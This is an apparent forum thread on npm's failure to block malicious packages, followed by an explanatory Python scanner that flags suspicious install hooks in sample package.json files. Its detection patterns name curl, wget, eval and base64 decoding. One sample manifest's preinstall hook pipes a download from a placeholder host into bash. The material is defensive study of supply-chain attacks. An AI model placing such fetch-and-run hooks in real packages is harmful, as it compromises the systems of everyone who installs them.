captn3m0 4 hours ago

1. _Multiple third-party companies_ can detect these obviously malicious packages in almost-real-time.
2. NPM still not only publishes them, but also keeps distributing them for anything beyond 5 minutes.

Microsoft/GitHub/NPM can only keep repeating "security is our top priority" so many times. But NPM still doesn't detect these simple attacks, and we keep having this every week.
silverwind 2 hours ago | parent

It'll always be a cat-and-mouse game. If npm adds protections, it'll only yield false positives and workarounds will be trivial.
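The tension both comments describe, near-real-time heuristic detection on one side and false positives on the other, as an added example that is not from either commenter, from npm, or from any scanning vendor: a small install-script scanner over constructed package.json manifests. The rule set, package names and URLs are assumptions made for illustration, not any registry's real rules. The three samples are a manifest that pipes a download into a shell (flagged for blocking), a benign package that fetches a prebuilt binary in postinstall and trips the same fetch rule (the false-positive cost silverwind points to), and a plain native build that passes.

```python
import json
import re

# Lifecycle hooks npm runs automatically during `npm install`; an install-time
# detector looks at these first because they execute before the consumer sees
# any of the package's code.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed heuristic rules (assumption: illustrative, not a vendor rule set).
SUSPICIOUS_PATTERNS = {
    "remote_fetch": re.compile(r"\b(curl|wget)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(sh|bash)\b"),
    "inline_eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"base64\s+(-d|--decode)\b|\batob\("),
    "node_eval": re.compile(r"\bnode\s+-e\b"),
}

# Rules strong enough to block on their own; remote_fetch alone is only a
# review signal because legitimate packages download prebuilt artifacts too.
HIGH_CONFIDENCE = {"pipe_to_shell", "inline_eval", "base64_decode", "node_eval"}


def scan_manifest(manifest):
    """Return one finding per (hook, rule) match in the install-time scripts."""
    findings = []
    scripts = manifest.get("scripts", {})
    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        for rule, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(command):
                findings.append({
                    "package": manifest.get("name", "<unnamed>"),
                    "hook": hook,
                    "rule": rule,
                    "script": command,
                })
    return findings


def verdict(manifest):
    """Map findings to 'block', 'review' or 'allow'."""
    rules = {f["rule"] for f in scan_manifest(manifest)}
    if rules & HIGH_CONFIDENCE:
        return "block"
    if rules:
        return "review"
    return "allow"


# Constructed sample manifests (names and URLs are placeholders, not real packages).
MALICIOUS = json.loads("""{
  "name": "example-suspicious-pkg",
  "version": "1.0.0",
  "scripts": {"preinstall": "curl -s https://example.invalid/x.sh | bash"}
}""")

NOISY = json.loads("""{
  "name": "example-prebuilt-pkg",
  "version": "2.3.1",
  "scripts": {"postinstall": "curl -fsSL https://example.invalid/prebuilt.tar.gz -o prebuilt.tar.gz && tar xzf prebuilt.tar.gz"}
}""")

CLEAN = json.loads("""{
  "name": "example-native-pkg",
  "version": "0.4.0",
  "scripts": {"install": "node-gyp rebuild", "test": "node test.js"}
}""")


if __name__ == "__main__":
    for manifest in (MALICIOUS, NOISY, CLEAN):
        print(manifest["name"], "->", verdict(manifest))
        for finding in scan_manifest(manifest):
            print("   ", finding["hook"], finding["rule"], "|", finding["script"])
```

Running it shows the asymmetry the thread is about: the pipe-to-shell sample is caught by a pattern this simple, while the prebuilt-download sample lands in the review bucket on the very same fetch rule, which is the noise a registry has to absorb or triage if it turns such checks on.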